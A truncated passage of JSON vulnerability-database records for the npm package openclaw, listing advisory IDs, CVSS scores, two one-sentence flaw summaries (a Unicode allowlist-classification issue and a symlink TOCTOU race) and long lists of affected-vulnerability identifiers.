ID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-31989","GHSA-g99v-8hwm-g76g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rwgg-8hg2-5kd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50489?format=json","vulnerability_id":"VCID-s66b-8pbe-2kb4","summary":"OpenClaw: Unicode canonicalization drift in node metadata policy classification could broaden node allowlists\nA paired node could supply Unicode-confusable `platform` or `deviceFamily` metadata that passed metadata pinning but classified differently for command policy resolution, broadening default node command 
allowlists.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-392f-ggf5-fp3c","reference_id":"GHSA-392f-ggf5-fp3c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-392f-ggf5-fp3c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-392f-ggf5-fp3c","reference_id":"GHSA-392f-ggf5-fp3c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-392f-ggf5-fp3c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"}
,{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"}
,{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"}
,{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"}
,{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"}
,{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"}
,{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"}
,{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-392f-ggf5-fp3c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s66b-8pbe-2kb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50512?format=json","vulnerability_id":"VCID-zm2t-r33r-fffy","summary":"OpenClaw's TOCTOU symlink race in writeFileWithinRoot could create or truncate files outside root boundaries\nA symlink-retarget TOCTOU race in `writeFileWithinRoot` could point an attacker-controlled path alias outside the configured root between resolution and write 
operations.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-x82f-27x3-q89c","reference_id":"GHSA-x82f-27x3-q89c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x82f-27x3-q89c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x82f-27x3-q89c","reference_id":"GHSA-x82f-27x3-q89c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x82f-27x3-q89c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability
":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability
":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability
